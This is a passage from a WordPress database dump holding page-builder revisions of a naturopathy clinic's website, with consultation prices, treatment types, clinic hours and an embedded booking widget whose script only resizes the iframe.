header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 21:15:15','2021-05-27 13:15:15','',28,'https://verdenaturopathy.com.au/?p=248',0,'revision','',0),(246,1,'2021-05-27 21:12:42','2021-05-27 13:12:42','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"IMG_20200714_175859_865\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 21:12:42','2021-05-27 13:12:42','',28,'https://verdenaturopathy.com.au/?p=246',0,'revision','',0),(322,1,'2021-06-14 14:38:47','2021-06-14 06:38:47','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"169px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Make a booking</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"600px\" custom_padding=\"0px|||||\"][et_pb_row _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_code _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<iframe id=\'cliniko-83558843\' src=\'https://verde-health.au2.cliniko.com/bookings?practitioner_id=430041868173056552&embedded=true\' frameborder=\'0\' scrolling=\'auto\' width=\'100%\' height=\'1000\' style=\'pointer-events: auto;\'></iframe><!-- [et_pb_line_break_holder] --><script type=\'text/javascript\'><!-- [et_pb_line_break_holder] --> window.addEventListener(\'message\', function handleIFrameMessage (e) {<!-- [et_pb_line_break_holder] --> var clinikoBookings = document.getElementById(\'cliniko-83558843\');<!-- [et_pb_line_break_holder] --> if (typeof e.data !== \'string\') return;<!-- [et_pb_line_break_holder] --> if (e.data.search(\'cliniko-bookings-resize\') > -1) {<!-- [et_pb_line_break_holder] --> var height = Number(e.data.split(\':\')[1]);<!-- [et_pb_line_break_holder] --> clinikoBookings.style.height = height + \'px\';<!-- [et_pb_line_break_holder] --> }<!-- [et_pb_line_break_holder] --> e.data.search(\'cliniko-bookings-page\') > -1 && clinikoBookings.scrollIntoView();<!-- [et_pb_line_break_holder] --> });<!-- [et_pb_line_break_holder] --></script>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" 